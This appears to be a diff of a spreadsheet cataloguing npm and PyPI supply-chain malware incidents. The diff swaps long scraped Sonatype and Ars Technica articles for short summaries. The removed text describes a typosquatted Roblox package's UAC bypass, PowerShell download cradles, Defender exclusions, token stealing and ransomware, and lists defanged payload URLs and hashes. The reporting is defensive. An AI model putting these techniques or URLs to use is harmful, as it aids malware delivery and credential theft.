'manifest', 'file', 'packagejson', 'dependency', 'package', 'author', 'account', 'sonatype', 'research', 'team', 'hour', 'klow', 'legitimate', 'javascript', 'library', 'developer', 'hardware', 'specific', 'browser', 'engine', 'useragent', 'http', 'header', 'sonatype', 'researcher', 'elshakankiry', 'package', 'cryptocurrency', 'miner', 'package', 'current', 'operating', 'system', 'preinstall', 'stage', 'script', 'user', 'window', 'unixbased', 'operating', 'system', 'script', 'download', 'binary', 'argument', 'mining', 'pool', 'wallet', 'mine', 'cryptocurrency', 'number', 'thread', 'batch', 'script', 'package', 'script', 'download', 'host', 'cryptominer', 'installation', 'identical', 'bash', 'script', 'jsextension', 'binary', 'host', 'screenshot', 'test', 'mining', 'malicious', 'run', 'background', 'machine', 'purpose', 'demonstration', 'showing', 'process', 'clear', 'author', 'package', 'developer', 'obvious', 'sign', 'case', 'dependency', 'hijacking', 'impersonate', 'legitimate', 'attack', 'weak', 'brandjacking', 'attempt', 'sonatype', 'research', 'team', 'malicious', 'package', 'hour', 'release', 'package', 'team', 'open', 'source', 'supplychain', 'attack', 'advanced', 'protection', 'particular', 'discovery', 'indication', 'developer', 'adversary', 'software', 'write', 'sonatype', 'novel', 'brandjacking', 'software', 'repository', 'critical', 'vulnerability', 'attack', 'copycat', 'package', 'wellknown', 'tech', 'company', 'good', 'news', 'past', 'week', 'malware', 'detection', 'system', 'thousand', 'suspicious', 'package', 'component', 'malicious', 'malicious', 'dependency', 'confusion', 'copycat', 'malware', 'detection', 'capability', 'intelligence', 'ecosystem', 'diligence', 'luck', 'expertise', 'professional', 'hundred', 'terabyte', 'datum', 'order', 'pace', 'malware', 'mutation', 'analysis', 'package', 'developer', 'safe', 'help', 'proactive', 'safeguard', 'software', 'supply', 'chain', 'attack', 'malware', 'detection', 'system', 'part', 'sonatype', 'repository', 'firewall', 'sonatype', 'intelligence', 'research', 'team', 'fullspectrum', 'protection', 'sonatype', 'likely', 'malicious', 'component', 'historical', 'supply', 'chain', 'attack', 'fivedozen', 'signal', 'insight', 'potential', 'attack', 'researcher', 'system', 'flag', 'package', 'dependency', 'suspicious', 'quarantine', 'queue', 'manual', 'review', 'sonatype', 'research', 'team', 'user', 'repository', 'firewall', 'suspicious', 'package', 'underway', 'component', 'downstream', 'developer', 'open', 'source', 'build', 'environment', 'user', 'dependency', 'confusion', 'policy', 'feature', 'proactive', 'protection', 'dependency', 'confusion', 'attack', 'package', 'name', 'public', 'repository', 'private', 'internal', 'repos', 'sonatype', 'worldclass', 'research', 'datum', 'malware', 'detection', 'technology', 'developer', 'customer', 'software', 'supply', 'chain', 'infectionsst', 'content', 'update', 'disclosure', 'malicious', 'package', 'legitimate', 'million', 'subsequent', 'blog', 'post', 'uaparserjs', 'compromise', 'tag', 'vulnerability', 'nexus', 'intelligence', 'insight', 'researcher', 'sonatype', 'engineer', 'passion', 'perpetual', 'learning', 'work', 'expert', 'analysis', 'medium', 'outlet', 'expertise', 'vulnerability', 'research', 'reverse', 'engineering', 'software', 'development', 'spare', 'time', 'vulnerability', 'wide', 'range', 'audience', 'author', 'topic', 'post', 'open', 'source', 'attacker', 'next', 'package', 'curious', 'case', 'csrfmagic', 'case', 'study', 'supply', 'chain', 'sharma', 'overload', 'crisis', 'vulnerability', 'management', 'package', 'vulnerability', 'connect', 'ssrf', 'vulnerability', 'vulnerability', 'software', 'supply', 'chain', 'platform', 'platform', 'overview', 'firewall', 'repository', 'lifecycle', 'sbom', 'manager', 'pricing', 'product', 'container', 'auditor', 'legal', 'pack', 'lifecycle', 'foundation', 'solution', 'role', 'innovation', 'developer', 'legal', 'compliance', 'industry', 'government', 'financial', 'service', 'manufacturing', 'technology', 'healthcare', 'community', 'free', 'tool', 'nexus', 'repository', 'sonatype', 'vulnerability', 'scanner', 'sonatype', 'index', 'resource', 'update', 'blog', 'whitepaper', 'ebook', 'customer', 'story', 'partner', 'partner', 'partner', 'amazon', 'customer', 'portal', 'training', 'workshop', 'documentation', 'sonatype', 'customer', 'support', 'company', 'career', 'newsroom', 'contact', 'press', 'center', 'late', 'software', 'news', 'event', 'term', 'service', 'privacy', 'policy', 'modern', 'slavery', 'statement', 'event', 'term', 'condition', 'personal', 'information', 'copyright', 'sonatype', 'right', 'thirdparty', 'code', 'sonatype', 'sonatype', 'nexus', 'trademark', 'sonatype', 'trademark', 'foundation', 'trademark', 'property', 'respective', 'owner']</t>
         </is>
       </c>
     </row>
@@ -5041,15 +4335,14 @@
           <t>npm</t>
         </is>
       </c>
-      <c r="C177" t="inlineStr"/>
+      <c r="C177" t="inlineStr">
+        <is>
+          <t>Three malicious versions of the UA-Parser-JS library, which detects a users browser, engine, OS, CPU, and device via their browsers user agent, surfaced.</t>
+        </is>
+      </c>
       <c r="D177" t="inlineStr">
         <is>
           <t>https://www.bleepingcomputer.com/news/security/popular-npm-library-hijacked-to-install-password-stealers-miners/</t>
-        </is>
-      </c>
-      <c r="E177" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -5066,17 +4359,12 @@
       </c>
       <c r="C178" t="inlineStr">
         <is>
-          <t>skip navigation back platform platform overview automate software supply chain sonatype repository firewall block malicious open source door sonatype nexus repository build fast centralized components sonatype lifecycle control open source risk across sdlc sonatype sbom manager simplify sbom compliance monitoring integrations work tools languages packages already solutions integrated innovation align teams fuel secure deployment developers deliver quality code fast application manage vulnerability risks legal compliance enforce policy scale industry government financial services manufacturing technology healthcare pricing resources resources featured devops downloads webinar series featured state software supply chain blog webinars whitepapers ebooks launchpad customer stories free tools sonatype repository sonatype vulnerability scanner sonatype index customer resources training workshops documentation support partners become partner join extensive sonatype partner network find partner find connect certified sonatype partner company explore software supply chain management story careers innovate us—explore opportunities sonatype events attend inperson virtual learning events newsroom keep date sonatype news contact let’s talk software supply chain book demo book demo book demo fake roblox package installs ransomware spooky surprise october juan aguirre minute read time share world coming terms uaparserjs library hijacking incident sonatypes discovery cryptomining malware last week found bigger spookier issue time halloween could actors abuse open source ecosystems like pypi rubygems deploy ransomware crucial question raised first time recent discovery malicious packages nobloxjsproxy nobloxjsproxies answer unequivocal full details typosquatting packages mimic nobloxjs popular roblox game wrapper exists standalone package along legitimate variants nobloxjsproxied ending tracked sonatype20211526 research data nobloxjs open source javascript popular game roblox users commonly utilize library downloaded times date create ingame scripts interact roblox website since discovered typosquats quickly minimal impact nobloxjsproxy seeing total downloads nobloxjsproxies seeing total downloads clear type scale actors hoping going popular component developers behind malicious typosquats nobloxjsproxy nobloxjsproxies implemented extra unwanted functionalities trojans ransomware even spooky surprise nobloxjsproxy flagged sonatypes automated malware detection system investigating package research team also came across nobloxjsproxies highlights importance combining automation human research protecting open source ecosystems sonatype built system find issues employ army researchers confirm note many similarities nobloxjsproxy nobloxjsproxies along fact uploaded actor darkdev darkdev1 referred packages interchangeably references behavior nobloxjsproxy also largely representative latter’s behavior typosquats display official nobloxs readme page first glance packages look legitimate page shows readme official noblox package first release nobloxjsproxy version looks completely normal contains functional code correct definitions benign postinstall script starting noticed obfuscated text within used inoffensive postinstalljs file fairly common actors place malicious code within manifest file packagejson file even commonly days within postinstall scripts defined manifest file thats also case packagejson file launches postinstalljs contains suspicious line code legitimate reasons projects minimize code even obfuscate seemingly random piece obfuscated code middle plain readable functions immediate flag lets focus obfuscated minified javascript drops cryptic batch script besides highlighting actor instance wanted share little researchers investigating types findings well went truly identify whether malicious trying deobfuscate code something readable came conclusion need work obfuscation encodingdecoding skills however pretty decent dynamic analysis decided luck interestingly launching malicious package ubuntu handy error message stating cmdexe setupbat couldn’t looking directory executed malware also seeing setupbat file cmdexe reference dropped batch file instantly indicate malware targets windows users noticed batch file heavily obfuscated upon looking closely appeared encoded looked like chinese characters first even translator attempt make something googlefu came rescue turns utf16 file needed save tell text editor wanted view thanks stackoverflow post resolved mystery next opened batch script favorite text editor took look obfuscated result reopening file utf16 better still couldnt really make much urls buried cleartext readable malicious binaries wanted better understand googlefu read something called variable expansion process simply replacing variable enclosed value knew urls prefixed https started replacing values knew added automation awesome result successful round variable expansion batch script became legible batch script alters windows registry drops trojans ransomware everything started become clearer batch script first attempts windows user account control bypasses fodhelperexe trusted windows binary facilitates features demand followed powershell download ‘cradles’ grab malicious executables stage following malicious executables downloaded discords server excludebat legionexe 000exe tunamorexe going performing dynamic analysis great part assisted awesome anyrun sandbox start piece together malware actually oneliner batch script excludebat runs first attempts turn antivirus agents avoid detection adds directory root windows defender exclusions list next legionexe drops multiple files including stealerexe performs registry changes avoid detection main functionality executable steal discord tokens stored browser system credentials achieve persistence legionexe also copies microsoft update manager away ransomewhere 000exes turn executable meaning ilspy dnspy roughly reconstruct source code first noticed interesting operations keyboard hooks came across dropped files 000exe dropping even files text file batch script richtext documents last video shown gets spooky texttxt file containing string next windlbat attempts windows user account name next drop malicious file execute rniwexe rniw executable attempts exhaust system resources repeatedly popping alert boxes message away pinging nonstop thats order ambient threats correct manner actors even play video gave goosebumps finally tunamorexe spun thought funny given amor spanish love absolutely love executable flagged virustotal remote access trojan possibly taidoor taking look executable isnt ransomware likely actors payday ransom note generated tunamorexe unconfirmed ransom note looks identical ones seen mbrlocker variants generated using publicly available tools released youtube discord report released bleepingcomputer last year stated mbrlocker variants likely used part pranks played people malicious typosquatting package main goal stealing tokens credentials installing trojans infecting victims system ransomware spooky videos notes along oddly enough actor also posted copies malicious packages github pushed additional commit remove malicious code time analysis october malicious package nobloxjsproxy already taken however second package nobloxjsproxies emerged shortly discovered sonatype yesterday october promptly reported package removed team less hour report indicators compromise iocs files checksum sha1 legionexe d361f250684b8f5dd4073aa873971cb424959da7 000exe 33c341130bf9c93311001a6284692c86fec200ef tunamorexe e398138686eedcd8ef9de5342025f7118e120cdf stealerexe f839971b1fac2b0d6119b67440b90691b3d2bdc8 rniwexe 97bb45f4076083fca037eee15d001fd284e53e47 urlsips hxxpscdndiscordappcomattachments884900935283916881884913366945112094excludebat hxxpscdndiscordappcomattachments884900935283916881884906713071890462legionexe hxxpscdndiscordappcomattachments884900935283916881884919522350477372000exe hxxpscdndiscordappcomattachments884900935283916881884919401500000286tunamorexe hxxpsitroublvehackergq whats next protecting open source ecosystems last year colleague researcher sharma raised question ransomware operators next actors exploit trust within opensource ecosystem seems right actors successfully injected plenty malicious executables trojans simpler ransomware carefully picked typosquat given textual hints spooky video contained package incident appears prank attack demonstrates myriad possibilities adversaries look targeting open source registries clever typosquatting dependency hijacking attacks october eventful month terms malware repeatedly discovered legitimate uaparserjs library hacked dependency hijacking proofofconcept copycats sonatype continuing catch daily basis particular discovery indication adversaries arent going stop anytime soon sonatype tracing novel brandjacking typosquatting cryptomining malware lurking software repositories weve also found critical vulnerabilities nextgen supplychain attacks well copycat packages targeting wellknown tech companies good news automated malware detection system powered sonatype intelligence caught thousands suspicious packages helping keep customers safe components either confirmed malicious previously known malicious dependency confusion copycats users sonatypes sonatype repository firewall protected suspicious packages review underway existing components quarantined pulled downstream developers open source build environment sonatypes worldclass research data combined automated malware detection technology safeguards developers customers software supply chain infections tags vulnerabilities nexus intelligence insights devzone sonatype repository firewall written juan aguirre juan researcher sonatype part team helped sonatype catalog million open source components learn author posts topic posts intro malware analysis analyzing python malware juan aguirre year deep dive nodeforge cve20220122 juan aguirre tracking nobloxjs malware campaign juan aguirre overload unveiling hidden crisis vulnerability management vulnerabilities packages spread bladeroid cryptostealer hijack instagram vulnerabilities exploited ivanti connect ssrf vulnerability traced back xmltooling library vulnerabilities secure software supply chain explore platform started platform overview firewall repository lifecycle sbom manager integrations pricing products container auditor advanced legal pack lifecycle foundation solutions role integrated innovation developers application legal compliance industry government financial services manufacturing technology healthcare community free tools nexus repository sonatype vulnerability scanner sonatype index resources launchpad log4j updates blog whitepapers ebooks webinars customer stories partners find partner become partner amazon services openshift customer portal training workshops documentation sonatype customer support company careers newsroom investors contact press trust center subscribe latest software news events terms service privacy policy modern slavery statement event terms conditions sell personal information copyright 2008present sonatype rights reserved includes thirdparty code listed sonatype sonatype nexus trademarks sonatype apache maven maven trademarks apache software foundation m2eclipse trademark eclipse foundation trademarks property respective owners</t>
+          <t>Malicious NPM packages pretending to be Roblox libraries are delivering ransomware and password-stealing trojans on unsuspecting users.</t>
         </is>
       </c>
       <c r="D178" t="inlineStr">
         <is>
           <t>https://blog.sonatype.com/fake-npm-roblox-api-package-installs-ransomware-spooky-surprise</t>
-        </is>
-      </c>
-      <c r="E178" t="inlineStr">
-        <is>
-          <t>['navigation', 'back', 'platform', 'platform', 'overview', 'automate', 'software', 'supply', 'chain', 'sonatype', 'repository', 'firewall', 'block', 'malicious', 'open', 'source', 'door', 'sonatype', 'repository', 'fast', 'component', 'lifecycle', 'control', 'open', 'source', 'risk', 'manager', 'compliance', 'monitoring', 'work', 'tool', 'language', 'package', 'solution', 'innovation', 'align', 'team', 'secure', 'deployment', 'developer', 'quality', 'code', 'fast', 'application', 'vulnerability', 'risk', 'legal', 'compliance', 'enforce', 'policy', 'scale', 'industry', 'government', 'financial', 'service', 'manufacturing', 'technology', 'healthcare', 'pricing', 'resource', 'resource', 'download', 'webinar', 'series', 'state', 'software', 'supply', 'chain', 'blog', 'webinar', 'whitepaper', 'launchpad', 'customer', 'story', 'free', 'tool', 'repository', 'sonatype', 'vulnerability', 'scanner', 'sonatype', 'index', 'customer', 'resource', 'training', 'workshop', 'documentation', 'support', 'partner', 'partner', 'extensive', 'sonatype', 'partner', 'network', 'partner', 'connect', 'sonatype', 'partner', 'company', 'software', 'supply', 'chain', 'management', 'story', 'career', 'opportunity', 'event', 'virtual', 'learning', 'event', 'newsroom', 'date', 'sonatype', 'news', 'contact', 'talk', 'software', 'supply', 'chain', 'book', 'demo', 'book', 'demo', 'book', 'fake', 'roblox', 'package', 'ransomware', 'spooky', 'surprise', 'time', 'share', 'world', 'term', 'uaparserjs', 'library', 'hijacking', 'incident', 'sonatype', 'malware', 'last', 'week', 'big', 'spooky', 'issue', 'time', 'halloween', 'actor', 'open', 'source', 'ecosystem', 'rubygem', 'ransomware', 'crucial', 'question', 'first', 'time', 'recent', 'discovery', 'malicious', 'package', 'nobloxjsproxy', 'nobloxjsproxie', 'unequivocal', 'full', 'detail', 'package', 'nobloxjs', 'popular', 'roblox', 'game', 'wrapper', 'standalone', 'package', 'legitimate', 'variant', 'research', 'datum', 'nobloxjs', 'open', 'source', 'javascript', 'popular', 'game', 'roblox', 'user', 'library', 'time', 'date', 'ingame', 'script', 'roblox', 'website', 'typosquat', 'minimal', 'impact', 'nobloxjsproxy', 'total', 'download', 'nobloxjsproxie', 'total', 'download', 'clear', 'type', 'scale', 'actor', 'popular', 'component', 'developer', 'malicious', 'typosquat', 'nobloxjsproxy', 'nobloxjsproxie', 'extra', 'unwanted', 'functionality', 'ransomware', 'spooky', 'surprise', 'nobloxjsproxy', 'sonatype', 'malware', 'detection', 'system', 'package', 'research', 'team', 'nobloxjsproxie', 'importance', 'automation', 'human', 'research', 'open', 'source', 'ecosystem', 'sonatype', 'system', 'issue', 'army', 'researcher', 'many', 'similarity', 'nobloxjsproxy', 'nobloxjsproxie', 'fact', 'actor', 'package', 'interchangeably', 'reference', 'behavior', 'nobloxjsproxy', 'representative', 'latter', 'behavior', 'typosquat', 'official', 'nobloxs', 'page', 'first', 'glance', 'package', 'legitimate', 'page', 'show', 'official', 'noblox', 'package', 'nobloxjsproxy', 'version', 'normal', 'functional', 'code', 'correct', 'definition', 'postinstall', 'script', 'obfuscated', 'text', 'inoffensive', 'postinstalljs', 'file', 'common', 'actor', 'malicious', 'code', 'manifest', 'file', 'packagejson', 'file', 'day', 'postinstall', 'script', 'manifest', 'file', 'case', 'packagejson', 'file', 'suspicious', 'line', 'code', 'legitimate', 'reason', 'project', 'code', 'random', 'piece', 'code', 'middle', 'plain', 'readable', 'function', 'immediate', 'flag', 'minified', 'javascript', 'cryptic', 'batch', 'script', 'actor', 'little', 'researcher', 'type', 'finding', 'malicious', 'code', 'readable', 'conclusion', 'work', 'obfuscation', 'skill', 'decent', 'dynamic', 'analysis', 'luck', 'malicious', 'package', 'handy', 'error', 'message', 'directory', 'malware', 'setupbat', 'file', 'reference', 'batch', 'file', 'malware', 'window', 'user', 'batch', 'file', 'chinese', 'character', 'translator', 'attempt', 'googlefu', 'rescue', 'utf16', 'file', 'save', 'tell', 'text', 'editor', 'view', 'thank', 'stackoverflow', 'mystery', 'batch', 'script', 'favorite', 'text', 'editor', 'look', 'obfuscated', 'result', 'file', 'utf16', 'much', 'url', 'cleartext', 'readable', 'malicious', 'binary', 'variable', 'expansion', 'process', 'variable', 'value', 'url', 'https', 'value', 'automation', 'awesome', 'successful', 'round', 'variable', 'expansion', 'batch', 'script', 'legible', 'batch', 'script', 'window', 'registry', 'trojan', 'ransomware', 'clear', 'batch', 'script', 'window', 'user', 'account', 'window', 'demand', 'powershell', 'download', 'cradle', 'malicious', 'executable', 'stage', 'malicious', 'executable', 'discord', 'tunamorexe', 'dynamic', 'analysis', 'great', 'part', 'awesome', 'anyrun', 'sandbox', 'start', 'piece', 'oneliner', 'batch', 'script', 'excludebat', 'first', 'attempt', 'agent', 'detection', 'directory', 'root', 'window', 'defender', 'exclusion', 'list', 'next', 'multiple', 'file', 'stealerexe', 'registry', 'change', 'detection', 'main', 'functionality', 'executable', 'browser', 'system', 'credential', 'persistence', 'update', 'manager', 'ransomewhere', '000exe', 'executable', 'meaning', 'ilspy', 'source', 'code', 'interesting', 'operation', 'keyboard', 'hook', 'file', 'file', 'text', 'file', 'batch', 'script', 'richtext', 'document', 'last', 'video', 'spooky', 'texttxt', 'file', 'string', 'next', 'windlbat', 'window', 'user', 'account', 'name', 'next', 'drop', 'malicious', 'file', 'execute', 'exhaust', 'system', 'resource', 'alert', 'box', 'message', 'order', 'ambient', 'threat', 'manner', 'actor', 'video', 'goosebump', 'funny', 'amor', 'spanish', 'love', 'executable', 'remote', 'access', 'look', 'executable', 'ransomware', 'likely', 'actor', 'payday', 'ransom', 'note', 'ransom', 'note', 'identical', 'one', 'mbrlocker', 'variant', 'available', 'tool', 'youtube', 'discord', 'report', 'bleepingcomputer', 'last', 'year', 'mbrlocker', 'variant', 'part', 'prank', 'people', 'malicious', 'typosquatting', 'package', 'main', 'goal', 'token', 'credential', 'trojan', 'victim', 'system', 'ransomware', 'spooky', 'video', 'enough', 'actor', 'copy', 'malicious', 'package', 'additional', 'commit', 'malicious', 'code', 'time', 'analysis', 'malicious', 'package', 'nobloxjsproxy', 'second', 'package', 'nobloxjsproxie', 'sonatype', 'yesterday', 'package', 'team', 'less', 'hour', 'report', 'indicator', 'compromise', 'file', 'checksum', 'open', 'source', 'ecosystem', 'last', 'year', 'colleague', 'question', 'ransomware', 'operator', 'next', 'actor', 'trust', 'opensource', 'ecosystem', 'right', 'actor', 'plenty', 'malicious', 'executable', 'simple', 'ransomware', 'typosquat', 'textual', 'hint', 'spooky', 'video', 'package', 'incident', 'prank', 'attack', 'myriad', 'possibility', 'adversary', 'open', 'source', 'registry', 'clever', 'dependency', 'hijacking', 'attack', 'eventful', 'month', 'term', 'malware', 'legitimate', 'uaparserjs', 'library', 'dependency', 'hijacking', 'copycat', 'catch', 'daily', 'basis', 'particular', 'discovery', 'indication', 'adversary', 'novel', 'brandjacking', 'software', 'repository', 'critical', 'vulnerability', 'attack', 'copycat', 'package', 'wellknown', 'tech', 'company', 'good', 'news', 'malware', 'detection', 'system', 'sonatype', 'intelligence', 'thousand', 'suspicious', 'package', 'customer', 'safe', 'component', 'malicious', 'malicious', 'dependency', 'confusion', 'copycat', 'user', 'sonatype', 'sonatype', 'repository', 'firewall', 'suspicious', 'package', 'underway', 'component', 'downstream', 'developer', 'source', 'environment', 'sonatype', 'worldclass', 'research', 'datum', 'malware', 'detection', 'technology', 'developer', 'customer', 'software', 'supply', 'chain', 'infection', 'tag', 'nexus', 'intelligence', 'insight', 'sonatype', 'firewall', 'team', 'catalog', 'open', 'source', 'component', 'author', 'post', 'topic', 'post', 'analysis', 'deep', 'dive', 'nodeforge', 'crisis', 'vulnerability', 'management', 'package', 'vulnerability', 'connect', 'ssrf', 'vulnerability', 'vulnerability', 'software', 'supply', 'chain', 'platform', 'platform', 'overview', 'firewall', 'repository', 'lifecycle', 'sbom', 'manager', 'pricing', 'product', 'container', 'auditor', 'legal', 'pack', 'lifecycle', 'foundation', 'solution', 'role', 'innovation', 'developer', 'legal', 'compliance', 'industry', 'government', 'financial', 'service', 'manufacturing', 'technology', 'healthcare', 'community', 'free', 'tool', 'nexus', 'repository', 'sonatype', 'vulnerability', 'scanner', 'sonatype', 'index', 'resource', 'update', 'blog', 'whitepaper', 'ebook', 'customer', 'story', 'partner', 'partner', 'partner', 'amazon', 'customer', 'portal', 'training', 'workshop', 'documentation', 'sonatype', 'customer', 'support', 'company', 'career', 'newsroom', 'contact', 'press', 'center', 'late', 'software', 'news', 'event', 'term', 'service', 'privacy', 'policy', 'modern', 'slavery', 'statement', 'event', 'term', 'condition', 'personal', 'information', 'copyright', 'sonatype', 'right', 'thirdparty', 'code', 'sonatype', 'sonatype', 'nexus', 'trademark', 'sonatype', 'trademark', 'foundation', 'trademark', 'property', 'respective', 'owner']</t>
         </is>
       </c>
     </row>
@@ -5091,15 +4379,14 @@
           <t>npm</t>
         </is>
       </c>
-      <c r="C179" t="inlineStr"/>
+      <c r="C179" t="inlineStr">
+        <is>
+          <t>Another popular npm library called 'coa', which is used in React packages around the world, was hijacked to distribute credential-stealing malware. The developer community noticed something was amiss when strange new versions of 'coa' appeared on npm, breaking software builds.</t>
+        </is>
+      </c>
       <c r="D179" t="inlineStr">
         <is>
           <t>https://www.bleepingcomputer.com/news/security/popular-coa-npm-library-hijacked-to-steal-user-passwords/</t>
-        </is>
-      </c>
-      <c r="E179" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -5116,17 +4403,12 @@
       </c>
       <c r="C180" t="inlineStr">
         <is>
-          <t>skip main content tech science policy cars gaming culture store forums subscribe close navigate store subscribe videos features reviews feeds mobile site staff directory contact advertise reprints filter topic tech science policy cars gaming culture store forums settings front page layout grid list site theme light dark sign sign times malware downloaded pypi times surprisingly stealthy malware infiltrating open source repositories getting sophisticated goodin enlarge getty images reader comments pypi—the open source repository large small organizations download code libraries—was hosting malicious packages downloaded times latest reported incidents threatening software supply chain jfrog firm monitors pypi repositories malware said packages notable lengths developers took camouflage malicious code network detection lengths include novel mechanism uses what’s known reverse shell proxy communications control servers fastly content distribution network another technique tunneling something jfrog said never seen malicious software uploaded pypi powerful vector “package managers growing powerful vector unintentional installation malicious code discovered pypi packages attackers getting sophisticated approach shachar menashe senior director jfrog research wrote email “the advanced evasion techniques used malware packages novel exfiltration even tunneling first we’ve seen packages uploaded pypi signal disturbing trend attackers becoming stealthier attacks open source software” researchers said pypi quickly removed malicious packages jfrog reported reading college student tricked coders running sketchy script open source repositories push malware dates back least college student uploaded malicious packages pypi rubygems gave packages names similar widely used packages already submitted users span several months imposter code executed times separate domains half time code given allpowerful administrative rights affected domains ended indication people inside military script advertisement slovakia’s national authority reported finding malicious packages downloaded pypi incorporated multiple pieces production software course three months since almost countless number instances malware sneaked repositories reading software downloaded times pypi ransacked developers’ machines july jfrog found malicious pypi packages downloaded times carried range nefarious activities including stealing credit card data injecting malicious code infected machines reading type supplychain attack serious consequences flourishing earlier year researcher developed type supply chain attack serious consequences socalled “dependency confusion attacks” work uploading malicious packages public code repositories giving names identical legitimate packages stored internal repository microsoft apple another large software developer developers’ softwaremanagement apps often favor external code libraries internal ones download malicious package rather trusted attacker victim fastly types attacks getting harder detect biggest advance subterfuge researchers found packages called “importantpackage” alternatively “importantpackage” called “10cent10” “10cent11” packages fastly disguise communications infected machine control server malicious code hiding packages causes https request sent pypipythonorg that’s indistinguishable legitimate request pypi requests eventually rerouted fastly http request control server psecforwardioglobalprodfastlynet server sends replies setup allowing twoway communication fastly makes easy people register domains service many cases registration even done anonymously advertisement enlarge jfrog jfrog researchers andrey polkovnychenko menashe explained pypi infrastructure hosted fastly hosting uses varnish transparent http proxy cache communication clients backend traffic first goes terminator decryption varnish proxy inspect contents http packet proxy analyzes http headers user’s request redirects request corresponding backend according host header process repeats reverse direction allowing malware imitate duplex communication pypi result commandandcontrol session encrypted signed legitimate server certificate making indistinguishable communicating legitimate pypi resources tunneling advanced evasion technique researchers found works using channel—normally reserved mapping domain names addresses—to send communications infected computer control server tunneling isn’t researchers said it’s first time seen technique used malware uploaded pypi growing sophistication malicious code sneaked pypi presumably repositories indication spreading malware likely continue developers rely public repositories take extra care ensure typos stray letters package name they’re downloading reader comments goodin goodin senior editor technica oversees coverage malware computer espionage botnets hardware hacking encryption passwords spare time enjoys gardening cooking following independent music scene advertisement channel technica previous story next story related stories today store subscribe feeds view mobile site contact staff advertise reprints newsletter signup join orbital transmission mailing list weekly updates delivered inbox sign cnmn collection wired media group condé nast rights reserved andor registration portion site constitutes acceptance user agreement updated privacy policy cookie statement updated technica addendum effective earn compensation sales links site read affiliate link policy california privacy rights sell personal information material site reproduced distributed transmitted cached otherwise used except prior written permission condé nast choices</t>
+          <t>JFrog said the packages are notable for the lengths its developers took to camouflage their malicious code from network detection.</t>
         </is>
       </c>
       <c r="D180" t="inlineStr">
         <is>
           <t>https://arstechnica.com/information-technology/2021/11/malware-downloaded-from-pypi-41000-times-was-surprisingly-stealthy/</t>
-        </is>
-      </c>
-      <c r="E180" t="inlineStr">
-        <is>
-          <t>['main', 'content', 'tech', 'science', 'policy', 'car', 'gaming', 'culture', 'store', 'forum', 'close', 'navigate', 'store', 'subscribe', 'video', 'review', 'mobile', 'site', 'staff', 'directory', 'contact', 'reprint', 'filter', 'topic', 'tech', 'science', 'policy', 'car', 'gaming', 'culture', 'store', 'forum', 'front', 'page', 'layout', 'grid', 'list', 'site', 'theme', 'light', 'dark', 'sign', 'sign', 'time', 'stealthy', 'malware', 'open', 'source', 'repository', 'sophisticated', 'goodin', 'enlarge', 'getty', 'image', 'reader', 'comment', 'open', 'source', 'repository', 'large', 'small', 'organization', 'code', 'library', 'malicious', 'package', 'time', 'late', 'incident', 'software', 'supply', 'chain', 'jfrog', 'firm', 'package', 'notable', 'length', 'developer', 'camouflage', 'malicious', 'code', 'network', 'detection', 'length', 'novel', 'mechanism', 'reverse', 'shell', 'proxy', 'communication', 'server', 'content', 'distribution', 'network', 'technique', 'jfrog', 'malicious', 'software', 'powerful', 'vector', 'package', 'manager', 'powerful', 'vector', 'unintentional', 'installation', 'malicious', 'code', 'attacker', 'sophisticated', 'approach', 'shachar', 'senior', 'director', 'jfrog', 'research', 'email', 'advanced', 'evasion', 'technique', 'malware', 'package', 'novel', 'exfiltration', 'package', 'signal', 'trend', 'attacker', 'stealthy', 'attack', 'source', 'software', 'researcher', 'malicious', 'package', 'jfrog', 'college', 'student', 'coder', 'sketchy', 'script', 'open', 'source', 'repository', 'malware', 'least', 'college', 'student', 'malicious', 'package', 'rubygem', 'package', 'name', 'similar', 'package', 'user', 'several', 'month', 'code', 'time', 'separate', 'domain', 'time', 'code', 'allpowerful', 'administrative', 'right', 'affected', 'domain', 'indication', 'people', 'military', 'script', 'advertisement', 'malicious', 'package', 'multiple', 'piece', 'production', 'software', 'course', 'month', 'countless', 'number', 'instance', 'malware', 'repository', 'software', 'time', 'developer', 'machine', 'jfrog', 'malicious', 'package', 'time', 'range', 'nefarious', 'activity', 'credit', 'card', 'datum', 'malicious', 'code', 'machine', 'type', 'supplychain', 'attack', 'serious', 'consequence', 'early', 'year', 'researcher', 'type', 'supply', 'chain', 'serious', 'consequence', 'dependency', 'confusion', 'attack', 'work', 'malicious', 'package', 'public', 'code', 'repository', 'name', 'identical', 'legitimate', 'package', 'internal', 'repository', 'large', 'software', 'developer', 'developer', 'softwaremanagement', 'app', 'external', 'code', 'library', 'internal', 'one', 'malicious', 'package', 'attacker', 'victim', 'type', 'attack', 'big', 'advance', 'subterfuge', 'researcher', 'package', 'importantpackage', 'importantpackage', 'package', 'communication', 'machine', 'control', 'server', 'hiding', 'package', 'https', 'request', 'pypipythonorg', 'indistinguishable', 'legitimate', 'request', 'request', 'http', 'request', 'server', 'server', 'reply', 'setup', 'twoway', 'communication', 'easy', 'people', 'domain', 'many', 'case', 'registration', 'advertisement', 'jfrog', 'jfrog', 'researcher', 'varnish', 'transparent', 'http', 'proxy', 'communication', 'client', 'traffic', 'terminator', 'decryption', 'varnish', 'proxy', 'content', 'http', 'packet', 'proxy', 'http', 'header', 'user', 'request', 'redirect', 'backend', 'host', 'header', 'process', 'reverse', 'direction', 'malware', 'duplex', 'communication', 'session', 'legitimate', 'server', 'certificate', 'indistinguishable', 'legitimate', 'resource', 'advanced', 'evasion', 'technique', 'researcher', 'work', 'channel', 'mapping', 'domain', 'name', 'address', 'communication', 'computer', 'control', 'server', 'researcher', 'first', 'time', 'technique', 'malware', 'sophistication', 'malicious', 'code', 'repository', 'indication', 'malware', 'developer', 'public', 'repository', 'extra', 'care', 'typo', 'letter', 'package', 'name', 'reader', 'comment', 'goodin', 'goodin', 'senior', 'editor', 'technica', 'coverage', 'malware', 'computer', 'espionage', 'botnet', 'hardware', 'encryption', 'password', 'spare', 'time', 'gardening', 'cooking', 'independent', 'music', 'scene', 'advertisement', 'channel', 'technica', 'previous', 'story', 'next', 'story', 'story', 'today', 'store', 'subscribe', 'view', 'mobile', 'site', 'contact', 'staff', 'reprint', 'newsletter', 'signup', 'orbital', 'transmission', 'mailing', 'list', 'weekly', 'update', 'inbox', 'sign', 'cnmn', 'collection', 'medium', 'group', 'reserved', 'andor', 'registration', 'portion', 'site', 'acceptance', 'user', 'agreement', 'privacy', 'policy', 'cookie', 'statement', 'technica', 'effective', 'compensation', 'sale', 'link', 'site', 'affiliate', 'link', 'right', 'personal', 'information', 